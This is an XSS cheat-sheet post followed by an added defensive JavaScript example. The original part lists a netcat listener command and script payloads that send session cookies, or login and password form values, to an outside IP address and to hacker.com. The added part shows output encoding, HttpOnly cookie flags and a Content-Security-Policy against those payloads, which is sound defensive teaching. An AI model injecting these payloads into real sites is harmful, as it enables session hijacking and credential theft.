XSS (Cross Site Scripting)

listener on evil host:

nc -l -p 80

example script on attacked server:

 <script>alert(document.cookie)</script>
  • Example 1
 <script>document.write('<img src=http://195.225.45.220/' + document.cookie + '>')</script>
  • Example 2
 <script>(new Image).src="http://195.225.45.220/c.php?c=" + escape(document.cookie)</script>
  • Example 3
 <script>(new Image).src='http://www.hacker.com/' + document.forms(1).login.value + ':' + document.forms(1).password.value</script>
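
Added example, not part of the original post: the payloads above depend on input being reflected unencoded, on the session cookie being readable from script, and on the browser being allowed to request an image from another origin. The JavaScript below shows the server-side control for each, using the post's payloads as sample input; all function names and the cookie name `sid` are hypothetical.

```javascript
// Added example: defensive controls mapped to the payloads listed in the post.
// Function names and the cookie name "sid" are assumptions for illustration.

// 1. Output encoding for HTML element and quoted-attribute contexts.
//    Reflected input passed through this cannot open a <script> tag
//    or break out of a quoted attribute.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// 2. Session cookie flags. HttpOnly removes the cookie from document.cookie,
//    so alert(document.cookie) and Examples 1 and 2 see no session value.
function sessionCookie(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// 3. Content-Security-Policy. HttpOnly does not help against Example 3,
//    which reads form fields instead of cookies. Omitting 'unsafe-inline'
//    stops injected inline <script> blocks from running, and img-src 'self'
//    blocks (new Image).src beacons to another origin.
function contentSecurityPolicy() {
  return ["default-src 'self'", "script-src 'self'", "img-src 'self'", "form-action 'self'"].join("; ");
}

// Headers a response handler would set alongside the encoded body.
function securityHeaders(sessionId) {
  return {
    "Set-Cookie": sessionCookie("sid", sessionId),
    "Content-Security-Policy": contentSecurityPolicy(),
  };
}

// Sample inputs: the payloads from the post, treated as untrusted user input.
const SAMPLES = [
  `<script>alert(document.cookie)</script>`,
  `<script>document.write('<img src=http://195.225.45.220/' + document.cookie + '>')</script>`,
  `<script>(new Image).src="http://195.225.45.220/c.php?c=" + escape(document.cookie)</script>`,
  `<script>(new Image).src='http://www.hacker.com/' + document.forms(1).login.value + ':' + document.forms(1).password.value</script>`,
];

// Encode every sample the way a template would before writing it into a page.
function renderSamples() {
  return SAMPLES.map(escapeHtml);
}

console.log(renderSamples().join("\n"));
console.log(securityHeaders("constructed-session-id"));
```

Output encoding is the primary fix; the cookie flags and CSP limit the damage if an encoding call is missed somewhere.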